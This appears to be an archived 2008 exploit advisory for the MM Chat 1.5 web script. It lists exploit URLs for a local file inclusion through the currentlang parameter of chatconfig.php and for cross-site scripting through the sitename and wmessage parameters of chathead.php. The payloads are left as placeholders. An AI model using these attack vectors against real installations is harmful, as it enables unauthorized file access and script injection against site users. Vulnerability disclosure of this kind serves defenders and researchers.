MM Chat 1.5 (LFI/XSS) Multiple Remote Vulnerabilities

2008-06-23T00:00:00
ID 1337DAY-ID-3278
Type zdt
Reporter CraCkEr
Modified 2008-06-23T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =====================================================
MM Chat 1.5 (LFI/XSS) Multiple Remote Vulnerabilities
=====================================================



-----------------------------------------------------------------------------¬
¦¦                             C r a C k E r                                --
--          T H E   C R A C K   O F   E T E R N A L   M I G H T             ¦¦
L-----------------------------------------------------------------------------

 -----      From The Ashes and Dust Rises An Unimaginable crack....      ----¬
-----------------------------------------------------------------------------¬
--               [ Local File Include ]            [XSS]                    --
L-----------------------------------------------------------------------------
:   Author   : CraCkEr                : :                                    :
¦   Group    : uNiTeD CraCkiNg ForCE  ¦ ¦                                    ¦
¦   Script   : MM Chat 1.5            ¦ ¦         Register Globals :         ¦
¦   Download : SourceForge.net        ¦ ¦                                    ¦
¦   Method   : GET                    ¦ ¦          [-] ON   [ ] OFF          ¦
¦   Critical : High [--------]        ¦ ¦                                    ¦
¦   Impact   : System access          ¦ ¦                                    ¦
¦ ------------------------------------- L----------------------------------- ¦
¦                              DALnet #crackers                             --
L-----------------------------------------------------------------------------
:                                                                            :
¦  Release Notes:                                                            ¦
¦  =============                                                             ¦
¦  Typically used for remotely exploitable vulnerabilities that can lead to  ¦
¦  system compromise.                                                        ¦
¦                                                                            ¦

-----------------------------------------------------------------------------¬
--                             Exploit URL's                                --
L-----------------------------------------------------------------------------


[LFI]

http://localhost/MMchat/chatconfig.php?currentlang=[LFI]

[XSS]

http://localhost/MMchat/chathead.php?sitename=[XSS]

http://localhost/MMchat/chathead.php?wmessage=[XSS]





L-----------------------------------------------------------------------------
 
Greets:
       The_PitBull, Raz0r, iNs, Sad, CwG GeNiuS

-----------------------------------------------------------------------------¬
--                              © CraCkEr 2008                              --
L-----------------------------------------------------------------------------




#  0day.today [2018-04-12]  #